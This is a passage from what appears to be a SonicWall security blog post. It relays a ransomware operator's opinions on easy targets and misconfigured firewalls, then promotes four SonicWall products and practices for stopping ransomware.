When he sees programs written in Java, he feels he is dealing with a non-qualified individual and, therefore, an easy target. It is also worth noting that some security professionals advise not to program in C when it comes to security.

Third, he casts shade on Americans and tech workers over the age of 35 either because of his belief in their lack of modern skills or energy to do the job properly. He says organizations should hire qualified people who can both code and understand security. If he was in charge of hiring at your company, and didn’t discriminate by age or nationality, he would hire people who hold qualifications in C or C++ and have the energy to follow security best practices.

Misconfigured firewalls leave doors open for ransomware attacks

Finally, Twig points out that misconfigured firewalls are his best friend. In fact, he has strong opinions for some firewall makers that enable him “to uninstall [the firewall] from the computer.” In the case of network firewalls, misconfigurations are easily done and can be one’s downfall. It happens more than you think.

In the case of endpoint firewalls, end-users should be under the principle of least privilege (POLP), which means they will have just enough rights to do their job and without the ability to modify their endpoints. In 2016, Microsoft reported that 94% of critical vulnerabilities can be mitigated by removing administrative rights from users.

Four ways SonicWall stops ransomware attacks

Stopping ransomware attacks isn’t always easy. A conversation with Twig makes that apparent. But he also highlights that if you follow best practices and implement security across different layers, ransomware attacks won’t be nearly as successful. Leverage the four key ways SonicWall helps organizations block ransomware attacks — automatically and in real time.

  • Deploy a firewall and keep security services active. Firewall vendors like SonicWall are now security platform providers that protect the traffic to and from branches (SD-WAN), and examine traffic through the firewall with gateway antivirus to stop known versions of malware. It’s also smart to leverage Intrusion Prevention Services (IPS) to identify known communication patterns within malware and stop what it wants to do, like travel laterally to other drives or networks. The combination of gateway security and IPS was critical in stopping WannaCry ransomware attacks for SonicWall customers on Day 1.
  • Block unknown ransomware with a sandbox. However, all of the updated versions of the strain that came after Version 1 were blocked automatically by the Capture Advanced Threat Protection (ATP) sandbox (if the other ransomware variants were found by a customer before SonicWall could create a definition/signature to block it on firewalls and email security).
  • Protect your inbox. To make it even more difficult to attack your network or users, use secure email solutions to block spoofed emails and examine attachments within all email to look for malware. Email is still highly effective at getting malware exploits onto your network.
  • Secure your endpoints. Finally, protect your endpoints with a next-generation anti-virus (NGAV) For example, Capture Client will help stop intrusions and ransomware attacks from initiating. Even if a ransomware strain did execute, Capture Client would give the administrator the ability to roll back the damage to a previously known clean state.

For the full story on my chats with Twig, I urge you to attend my upcoming webinar, “Mindhunter: My Two-Week Conversation with a Ransomware Cell.”